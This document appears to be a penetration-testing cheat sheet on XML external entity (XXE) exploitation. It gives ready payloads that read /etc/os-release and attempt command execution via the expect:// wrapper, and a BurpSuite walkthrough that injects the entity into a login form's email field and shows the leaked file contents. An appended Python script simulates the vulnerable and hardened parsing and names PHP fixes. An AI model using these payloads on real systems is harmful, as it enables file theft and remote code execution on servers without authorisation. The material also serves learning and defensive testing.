XXE Exploitation
PAYLOADS
- Read Files (the file contents come back wherever the application echoes the field that references &xxe;)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/os-release" >]>
- RCE
- We can use the expect:// wrapper. (This PHP module is not guaranteed to be present: it has to be installed manually.)
- Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
Vulnerable Application Scenario
Website login form with the fields NAME - USER - TEL - EMAIL - PASSWORD
- BurpSuite Request
- Our data is put into XML format and POSTed to process.php.
- Testing the request field by field, we find that the response echoes the email field back. (If one field does not work, keep testing to find a vulnerable one.) Vulnerable field: email. We reference &xxe; in that field.
- BurpSuite Request with the payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/os-release" >]>
<root>
<name>user</name>
<tel>3380</tel>
<email>
&xxe;
</email>
<password>
password
</password>
</root>
- BurpSuite Response
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
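Added example, not code from the original page: the whole procedure above in one runnable script. It builds the login-form XML with &xxe; referenced from the email field (the Read Files payload from the PAYLOADS section), then stands in for process.php with Python's xml.sax instead of PHP's parser, once with external general entities enabled (the vulnerable configuration that produced the response above) and once with them disabled (the fix). The file that gets read is a constructed stand-in for /etc/os-release written to a temp file, so the script runs offline and assumes nothing about the page's target; the function and class names are this example's own.

```python
"""Added example: build the XXE request from the scenario above and simulate
what process.php does with it, vulnerable and hardened.

The server side is stood in for by Python's xml.sax rather than PHP; the
file read is a constructed stand-in for /etc/os-release in a temp file.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample so the demo runs offline; the page's real target is
# file:///etc/os-release.
SAMPLE_OS_RELEASE = 'NAME="Ubuntu"\nVERSION_ID="18.04"\n'


def build_payload(target_url, name="user", tel="3380", password="password"):
    """Login-form XML with an external entity referenced from the vulnerable
    email field, as posted to process.php in the scenario above."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
        f'<!ENTITY xxe SYSTEM "{target_url}" >]>\n'
        "<root>\n"
        f"<name>{name}</name>\n"
        f"<tel>{tel}</tel>\n"
        "<email>&xxe;</email>\n"
        f"<password>{password}</password>\n"
        "</root>\n"
    )


class FieldCollector(ContentHandler):
    """Collects the text of each child of <root>, like a naive process.php
    that echoes the submitted fields back in its response."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        if name != "root":
            self._current = name
            self.fields.setdefault(name, "")

    def characters(self, content):
        # Text from an expanded external entity arrives here too, so the
        # file contents end up in whichever field referenced &xxe;.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_form(xml_text, resolve_external_entities):
    """Parse the posted XML.  With external general entities enabled the
    parser fetches the SYSTEM URL and substitutes its contents for &xxe;
    (vulnerable).  With them disabled, Python's default since 3.7.1, the
    reference is dropped and the field stays empty (hardened)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = FieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.fields


def demo():
    """Run the vulnerable and hardened parse against the same request and
    return (vulnerable_fields, hardened_fields)."""
    with tempfile.NamedTemporaryFile("w", suffix="-os-release", delete=False) as f:
        f.write(SAMPLE_OS_RELEASE)
        path = f.name
    try:
        payload = build_payload("file://" + path)
        return parse_form(payload, True), parse_form(payload, False)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable email field:\n" + vulnerable["email"])
    print("hardened email field: %r" % hardened["email"])
```

The vulnerable parse returns the temp file's contents in the email field, which is exactly what the BurpSuite response above shows for /etc/os-release; the hardened parse returns an empty email field because the entity reference is never resolved. On a PHP backend the equivalent switch is the LIBXML_NOENT flag to DOMDocument/SimpleXML (do not pass it), and on PHP versions before 8.0 additionally libxml_disable_entity_loader(true).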